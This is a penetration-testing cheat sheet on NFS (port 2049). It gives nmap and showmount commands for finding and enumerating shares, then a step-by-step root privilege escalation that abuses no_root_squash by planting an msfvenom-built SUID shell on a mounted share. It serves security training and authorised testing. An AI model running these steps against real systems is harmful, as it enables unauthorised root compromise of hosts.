# NFS

## Network File System - Port 2049

* Allows a user on a client computer to access files over a network as if it were local

```
nmap -sV -script=nfs-showmount <tgt>
showmount -e <tgt>
```

## NFS - Find and Enum

```
nmap -v -p 111 10.x.x.0/24 -oG nfs.nmap
cat nfs.nmap | grep 111 | grep -v "Nmap" | awk '{print $2}' > nfs.ip 
nmap -sV -p111 --script=rpcinfo -iL nfs.ip
ls -l /usr/share/nmap/scripts/nfs*
nmap -p111 --script nfs* -iL nfs.ip nfs.enum
```

## NFS - Sweep

* Wildcard NSE didnt work well
* Better to run NSE individually or as a Loop

```
> nmap -sV -p111,2049 10.x.x.0/24 -oG nfs.nmap 
> grep open nfs.nmap | cut -d' ' -f2 > nfs.ip 

> nmap -sV -p111,2049 --script=rpcinfo -iL nfs.ip -oN rpc_scripts.nmap
> nmap -sV -p111 --script=nfs* -iL nfs.ip -oN nfs_scripts2.nmap

> for vuln in $(ls -1 /usr/share/nmap/scripts/nfs* | cut -d "/" -f6); 
do nmap -p 111 --script $vuln 10.11.1.72; done 

```

## NFS Root Squashing

* Network File System
* Send a **rootbash** over NFS with local root impersonating remote root
* Only works if "**no\_root\_squash**" is setup
* Remote users can: mount/access/create/modify files
* Default: Created files inherit remote user/group ID
* Even if not on the NFS server
* How NFS protects obvious privesc
* If remote user claims to be root uid=0
* NFS will squash and treat as a nobody
* Feature can be disabled!
* REF: [TarBackups](https://pentest.mxhx.org/06-linux-privesc/tar-backup-tricks)

```
-------------------------
showmount -e <tgt>
nmap -sV -script=nfs-showmount <tgt>
mount -o rw,vers=2 <tgt>:<share> <localdir>

-------------------------
lse.sh -l 2 -i   ..found nfs share
cat /etc/exports
/tmp *(rw,sync,no_root_squash)

-------------------------
Local:
showmount -e 192.x.y.z
mkdir /tmp/nfs
mount -o rw,vers=2 192.x.y.z:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf

-------------------------
Target:
ls -l /tmp       ..owned by root, with suid
/tmp/shell.elf   ..executed as root
root!!
```